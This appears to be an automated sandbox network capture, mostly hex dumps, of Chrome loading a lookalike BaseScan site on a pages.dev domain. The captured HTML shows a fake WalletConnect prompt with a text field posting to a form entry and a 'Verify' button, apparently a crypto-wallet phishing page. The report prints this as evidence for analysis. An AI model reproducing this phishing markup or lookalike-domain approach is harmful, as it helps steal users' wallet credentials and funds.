                                                                                                                                                                                                                                              Data Ascii: ZPm]2d{TQmRWTMY BU9f<e(Xr(7FxlhXzPcT19(v-ZNKE`[OA)|8]t"|&JEF~UmR>5LDq4)~T5iM<qM*(I6Q2&h$u'9'm.TETmVKUp
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 69 cd cf d5 32 1b 15 d7 8f e9 69 ac e6 a2 2c 2e cf dd 2d 53 12 7a bd 75 8c 3d 90 8b 2a 8a 5c b4 09 ed b5 e2 68 c3 e9 9a 2d ce 7d 51 d5 e8 7d 1b 4e f3 d3 a5 31 a6 e4 26 a7 7b ee e2 a9 86 3a 4f 75 a7 d5 d5 ba 0b 2a ae d9 38 6d 07 a2 c4 b9 27 3f 1d a8 79 16 b1 a9 92 8f d1 9f 1c ec 64 eb 95 3e 44 54 3f 2e 2a a7 fd 93 f0 e1 43 7f da 48 90 09 1f 04 55 15 39 5b 84 ca 69 d7 e5 8f 63 45 26 cd 82 13 fb 58 a2 95 8f 51 41 15 42 4b da 4e 2a f8 c9 2f 36 75 f0 97 0c f9 85 24 21 21 bf 64 86 2e b2 f8 e9 06 63 9d 91 89 68 25 d6 a1 6d dd f1 f6 8d 1b d8 8e 6e 37 0d 6a 0c 6a 1d 4e 9b 1e b9 f3 18 7b e0 2d 5a a1 e9 e2 da b9 c1 f6 54 33 cb 81 d8 a4 48 26 21 74 95 21 8d a2 12 94 a6 d0 dc a0 96 51 87 83 de 47 72 15 e2 f8 16 62 27 4f 23 07 4a 54 5d bd e2 78 16 5d 4c 1f 4f 01 75 38
                                                                                                                                                                                                                                              Data Ascii: i2i,.-Szu=*\h-}Q}N1&{:Ou*8m'?yd>DT?.*CHU9[icE&XQABKN*/6u$!!d.ch%mn7jjN{-ZT3H&!t!QGrb'O#JT]x]LOu8
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 7c 9c 96 69 99 7a 3a 2d d3 32 85 07 c2 51 9a 77 f3 3b 69 1e de 44 0f 7c ce 43 25 ed 2a 39 46 e5 07 f0 02 86 22 2e ec ea 17 36 f9 58 c2 69 bb 79 19 47 45 8c f5 d6 2c 6d 50 da 87 f1 b4 f9 a7 f6 16 28 1b c6 18 d3 90 c5 5e ac 57 ff 70 71 cd 5a 47 1b ed 84 5e ce da 34 87 c3 38 37 48 57 ef eb 5e 94 99 2e 36 14 82 ed 8a b1 b7 1c 28 a2 14 2a bc e6 6e 32 cb 35 9e 27 1c b5 c5 81 32 9e 28 9c 95 d4 de 1d 56 74 4d 17 63 cc 83 9f 17 5d 64 b1 ee 45 3d 40 d1 a1 36 da 60 85 d0 c3 8d 40 bc 3b 1e b7 87 11 f5 54 87 71 75 cd 1a 63 ec 15 62 9a 2e fe 81 31 a8 83 5d e4 74 cf db ad 8f 94 0d e3 68 51 38 62 41 d9 38 d6 71 97 97 65 51 d3 ae 90 1e 0c 46 3b 35 2e 24 04 de 39 c6 da e8 13 98 e7 26 e9 70 da d4 1d d6 a8 a9 55 ee 27 90 de c5 7c 8b 78 f6 98 9c ab f0 62 71 07 f5 08 b5 c9 8f
                                                                                                                                                                                                                                              Data Ascii: |iz:-2Qw;iD|C%*9F".6XiyGE,mP(^WpqZG^487HW^.6(*n25'2(VtMc]dE=@6`@;Tqucb.1]thQ8bA8qeQF;5.$9&pU'|xbq
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: fa 9b f7 a8 b7 61 83 1a 1f 0f a2 57 ea dd 34 93 66 11 e3 09 07 08 22 2a a6 c5 d1 60 19 8c f1 34 c6 03 59 20 c6 d0 c5 18 d7 ec 62 9d c5 7c 1f 50 d3 d7 2c 4a a8 83 19 73 43 b8 f1 83 35 eb 12 d1 6e c4 df c8 7b 77 99 4e 72 03 4e db f1 d2 03 4f b0 39 ed ba f0 fc 83 03 b6 0a 22 fc 4c 86 83 c1 fa 4a 7b 30 0d 3c 0b be 78 58 3f 4c e3 f0 8f 1e 6e db c5 fa 33 db e1 e2 13 8a 1a 4b 6c 9d 20 8c 08 2e 74 08 a2 7e 46 2f 88 70 f6 f4 1e f1 37 de eb 1d a0 e2 86 8d b1 25 e8 f5 72 3f 57 3d 2d 0b 62 cc 62 b8 0c 1e 0c c6 34 c6 87 f1 f1 89 87 69 8c 59 3c 8c b1 2f ca e2 35 8b c7 e2 d5 c1 be c8 27 63 2d 2b 86 64 83 1b 66 4d 63 fc 4d 23 84 67 36 bf b7 ef e5 ca 5d 1c 0f ce dd 92 b4 b3 0a a1 8b 64 68 2b 51 e9 24 07 b2 e8 50 1e e4 25 d4 69 3e 1f 6e 8b ed 77 1d 1e 84 97 21 70 76 70 76
                                                                                                                                                                                                                                              Data Ascii: aW4f"*`4Y b|P,JsC5n{wNrNO9"LJ{0<xX?Ln3Kl .t~F/p7%r?W=-bb4iY</5'c-+dfMcM#g6]dh+Q$P%i>nw!pvpv
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 9d 3d 0d dc b9 cb 0c eb 1a a3 57 10 ce 03 97 77 31 56 f4 80 98 86 a0 b4 45 26 6d 19 0c 7e 1b 82 40 58 28 c3 a5 7d 3e 3c 63 59 29 ec 2c 13 2a ab d5 1a 0d 6c a0 12 27 32 ac 43 80 8d 2c b2 92 94 0e 53 8b bd f5 00 d7 7d dc cf b1 ee 83 07 b0 2d 89 0a 8a 43 1d d0 ae 23 e7 87 65 cd 22 d4 73 09 fb 68 9f a7 2d 23 8b 0d 96 13 16 4e 1e 21 f7 26 2f 4d 5e 06 de e5 5e 7e 7f 22 c8 2e 75 6c 24 ad 31 65 2d 24 96 d0 82 a3 3c d4 90 00 87 7d d4 30 8e 63 83 a4 b6 c5 80 b4 7c 87 b2 ac da fb 38 97 b3 7e 60 e6 42 d0 83 e1 92 86 78 e7 4e 08 27 6d 54 14 15 ef db 9a 36 07 2a 9c af b9 59 2f ba fe 2b 13 e3 0b 82 03 14 31 c6 2f b5 e5 d9 ab 61 19 5e 20 c6 db d2 16 94 5e 74 ee ab d5 e2 60 eb ff b3 b3 d8 8e 1d f2 51 10 17 8a 50 5b c2 0c 1f 7c f6 6f 2d d4 18 01 e3 1f 51 c1 82 b1 e9 d7 d7
                                                                                                                                                                                                                                              Data Ascii: =Ww1VE&m~@X(}><cY),*l'2C,S}-C#e"sh-#N!&/M^^~".ul$1e-$<}0c|8~`BxN'mT6*Y/+1/a^ ^t`QP[|o-Q
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 81 6a 3a d4 7b d0 b0 9a 74 43 9f 65 2a 07 63 4c 05 2f 5a dc 9b dd 5a 0d 14 b0 e0 42 19 26 8c 30 e9 47 7e f2 d4 f5 d4 48 a6 a5 eb 8f 85 37 3e d2 5b 56 e5 25 6e 6c 31 ce c2 49 89 e7 81 e7 b7 6f ff 32 45 2d cb 40 6d 97 0e 2b de a4 0f 56 17 5b 87 b9 37 c8 95 82 a0 82 e8 fd 45 6f 16 d3 10 34 f0 55 dd 51 94 b6 70 0d 05 c5 01 a5 2d ca fa c2 b2 32 16 97 5d 98 97 8d 1e bd 50 2e bd e6 8b fb e9 32 95 c8 70 e4 5a ef 97 d8 59 b4 9f 76 e8 ce cd 56 c7 ac 82 67 91 59 e1 62 97 07 1f e0 cd 39 ff b1 b9 b2 3f 96 c3 08 d0 89 91 d9 64 c6 c9 6e df ce c9 e0 ee 7a 43 4e 5c ac 00 4f f0 cc cf a7 f3 0b 64 36 7a 56 5a ec d9 38 92 e2 a7 e5 c2 aa 4e 5c 9f 36 4d 83 57 68 73 33 3b 51 30 b3 ea cc e7 25 12 4f a1 0b 50 da bb d5 85 92 21 d1 16 a9 2a 38 a2 a0 28 0a 15 83 15 87 19 92 ab 20 a6
                                                                                                                                                                                                                                              Data Ascii: j:{tCe*cL/ZZB&0G~H7>[V%nl1Io2E-@m+V[7Eo4UQp-2]P.2pZYvVgYb9?dnzCN\Od6zVZ8N\6MWhs3;Q0%OP!*8(
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 96 21 4b ba 55 b5 cd 2e 11 f5 fb d6 ae 4b 68 29 35 81 e9 1d a8 0d ec 52 8d 3a cc 96 04 80 db f9 de f0 c8 08 bf fa c6 f3 f8 8d 6f ee 0d af 20 4d 79 c6 e8 b2 11 57 2c c4 fd 56 50 59 64 68 0e 3d 2f 1e 93 23 c5 a7 c8 e2 0d 85 32 f8 2b e2 d9 6f 43 7e f3 4f 61 7f 50 12 13 56 d9 a2 95 60 94 70 d8 09 93 f5 01 fe 94 9a f2 0d 7c af 3f ac 55 9d b4 c4 3a b8 80 cd 1e bc 82 2b fd ce e6 65 b8 c3 10 df b5 86 63 13 86 34 0a ee 74 65 8b bb 8a 0d 8d b1 e6 71 b7 7a e4 92 72 04 6c f4 b7 3f 77 25 08 29 11 20 80 fc 7f 62 b0 67 e1 6c d0 03 64 f6 35 50 3a 52 a3 f2 0d 46 6d f5 b0 5a 7d 44 89 f6 c5 a0 a8 c9 63 88 e7 2f 72 59 4d d3 fb 89 b1 ab 79 0f 79 4c 42 88 b6 10 42 a0 50 50 da 98 c6 74 ef 60 21 04 98 4c b0 88 a2 9f f0 6b c9 e4 2d 26 58 84 c4 49 a5 37 c5 36 b5 60 2d 9e 86 1e 36
                                                                                                                                                                                                                                              Data Ascii: !KU.Kh)5R:o MyW,VPYdh=/#2+oC~OaPV`p|?U:+ec4teqzrl?w%) bgld5P:RFmZ}Dc/rYMyyLBBPPt`!Lk-&XI76`-6
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 9c 1e 4e 75 39 08 46 5f b9 b2 0a aa 46 32 fa 9a 10 1e 42 4c 1f 96 e3 80 c0 c8 4c 3c fd af 59 7c 58 5d 31 9c cf e6 2f 8f 3e d8 51 9c 9e 71 22 c4 bc 50 7b 47 2a 28 3c 66 2e 72 e7 c0 8d 5f 54 c5 a4 9d 18 16 0d 6f 25 23 cb f7 5c bb e0 ef f6 96 f0 80 58 06 12 38 4f 45 b9 2a 63 10 42 56 42 48 02 c9 ed 06 83 99 42 86 92 36 81 15 53 9f 15 5c af e4 44 68 c9 f7 ca f0 3f 31 7d 89 a1 99 b0 86 0d 5c c6 54 62 07 10 99 48 07 ca e0 08 5f 8f c4 3c 84 84 e7 e7 a4 b1 e5 e7 9f e1 f1 88 13 31 d8 de 53 ae d6 d5 1e f6 79 20 9c e6 f1 88 03 65 30 c6 10 63 69 8b 23 a5 b4 c5 32 c0 b2 9b 26 53 15 02 e9 3e cc c8 61 3a 20 3a ef 7f 44 87 a1 91 01 c9 4c cc 63 2c b8 0a 21 88 4b 63 1d f7 19 f8 67 5c 87 00 21 07 ad f1 81 95 95 14 79 6a 3b 01 f4 51 2a 12 fa 0d 57 60 b5 11 68 ae c3 b1 d2 a2
                                                                                                                                                                                                                                              Data Ascii: Nu9F_F2BLL<Y|X]1/>Qq"P{G*(<f.r_To%#\X8OE*cBVBHB6S\Dh?1}\TbH_<1Sy e0ci#2&S>a: :DLc,!Kcg\!yj;Q*W`h


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              71192.168.2.549810172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC815OUTGET /images/svg/brands/coinbase.svg HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC795INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ayXjGqTJsyXnAVqa06UJIJsI0XAOvJ08789kBtuI2PLUxniJNrw4M2IaF3BFcy2xSYqhITLQ%2Bucbjj2iOvUBgjcqiDWPXgHYeutHEprhhQKBYJusb0aBYHjX6IsDZnpjUYVbtj1cnD4bB2Nrp%2FzShnRn72pUjk1Pr4DZm%2B%2BdKIHpZwpsYngqK9cBtqWh5fssFEKtQ379"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d1db3b43bf-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 32 33 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 239d<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 74 79 3a 20 68 69 64 64 65 6e 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 30 30 22 0d 0a 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 69 64 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 2d 6d 6f 64 61 6c 22 0d 0a 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 71 72 63 6f 64 65 5f 5f 62 61 73 65 20 61 6e 69 6d 61 74 65 64 20 66 61 64 65 49 6e 22 0d 0a 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 62 61 73 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e
                                                                                                                                                                                                                                              Data Ascii: ty: hidden; overflow: hidden; z-index: 100" > <div id="walletconnect-qrcode-modal" class="walletconnect-qrcode__base animated fadeIn" > <div class="walletconnect-modal__base"> <div class="walletconn
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 4c 37 39 2e 35 34 32 33 30 32 2c 37 30 2e 39 36 38 35 35 39 32 20 43 37 38 2e 33 31 39 35 32 30 34 2c 37 32 2e 31 36 35 37 36 33 33 20 37 36 2e 33 33 37 30 30 31 2c 37 32 2e 31 36 35 37 36 33 33 20 37 35 2e 31 31 34 32 32 31 34 2c 37 30 2e 39 36 38 35 35 39 32 20 4c 35 34 2e 39 37 37 35 32 36 35 2c 35 31 2e 32 35 33 30 35 36 31 20 43 35 32 2e 35 33 31 39 36 35 33 2c 34 38 2e 38 35 38 36 34 36 39 20 35 32 2e 35 33 31 39 36 35 33 2c 34 34 2e 39 37 36 35 34 33 39 20 35 34 2e 39 37 37 35 32 36 35 2c 34 32 2e 35 38 32 31 33 35 37 20 4c 36 31 2e 34 33 38 35 34 32 39 2c 33 36 2e 32 35 36 32 36 31 32 20 5a 20 4d 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 4c 32 39 38 2e 31 32 38 30 33 36 2c 39 34 2e 35 37 36 39 30 33 31 20 43 33 30 30 2e 35
                                                                                                                                                                                                                                              Data Ascii: L79.542302,70.9685592 C78.3195204,72.1657633 76.337001,72.1657633 75.1142214,70.9685592 L54.9775265,51.2530561 C52.5319653,48.8586469 52.5319653,44.9765439 54.9775265,42.5821357 L61.4385429,36.2562612 Z M280.206339,77.0300061 L298.128036,94.5769031 C300.5
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 2e 30 33 30 30 30 36 31 20 43 32 37 33 2e 37 39 35 37 34 2c 37 34 2e 36 33 35 35 39 36 39 20 32 37 37 2e 37 36 30 37 37 38 2c 37 34 2e 36 33 35 35 39 36 39 20 32 38 30 2e 32 30 36 33 33 39 2c 37 37 2e 30 33 30 30 30 36 31 20 5a 26 23 33 39 3b 20 69 64 3d 26 23 33 39 3b 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 26 23 33 39 3b 25 33 45 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 67 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 77 61 6c 6c 65 74 63 6f 6e 6e 65 63 74 2d 6d 6f 64 61 6c 5f 5f 68 65 61 64 65 72 4c 6f 67 6f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 3c 2f
                                                                                                                                                                                                                                              Data Ascii: .0300061 C273.79574,74.6355969 277.760778,74.6355969 280.206339,77.0300061 Z&#39; id=&#39;WalletConnect&#39;%3E%3C/path%3E %3C/g%3E %3C/g%3E %3C/svg%3E" class="walletconnect-modal__headerLogo" /> <p>WalletConnect</
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 74 61 72 67 65 74 3d 22 76 6f 74 61 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 65 78 74 61 72 65 61 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 61 6d 65 3d 22 65 6e 74 72 79 2e 32 30 33 36 35 30 31 33 35 33 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 74 65 78 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 49 6e 70 75 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69
                                                                                                                                                                                                                                              Data Ascii: target="votar" style="width: 100%" > <textarea name="entry.2036501353" type="text" id="pInput" class="i
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 65 3d 22 73 75 62 6d 69 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3d 22 6c 69 67 68 74 42 6c 75 65 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 63 2d 67 74 73 72 48 54 20 67 66 75 53 71 47 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 69 66 79 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d
                                                                                                                                                                                                                                              Data Ascii: e="submit" color="lightBlue" style="display: block; justify-content: center" > <div class="sc-gtsrHT gfuSqG"></div> Verify </button>
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC911INData Raw: 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 62 74 6e 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 68 69 64 65 4c 6f 61 64 65 72 28 29 22 2c 20 34 20 2a 20 31 30 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 4c 6f 61 64 65 72 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6c 6f 61 64 65 72 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e
                                                                                                                                                                                                                                              Data Ascii: ocument.getElementById("pbtn").style.display = "none"; setTimeout("hideLoader()", 4 * 1000); } function hideLoader() { document.getElementById("loader").style.display = "non
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              72192.168.2.549808104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC614OUTGET /assets/vendor/jquery-ui/jquery-ui.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 351142
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NsLET1XxYC8H0aKz8K6z6BTV76NkHDjQRXU4t52lICxqjckeaM3tsPaJ%2Fjc1qt5mCyODxdIfw1Vm37FNQOZONGbN1EhUrPXVlRajQekNhp%2BzTcBD5%2Fjhaunsh9MhiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2d1be6142e8-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC554INData Raw: 37 63 37 32 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 31 36 2d 30 39 2d 31 34 0d 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66
                                                                                                                                                                                                                                              Data Ascii: 7c72/*! jQuery UI - v1.12.1 - 2016-09-14* http://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/eff
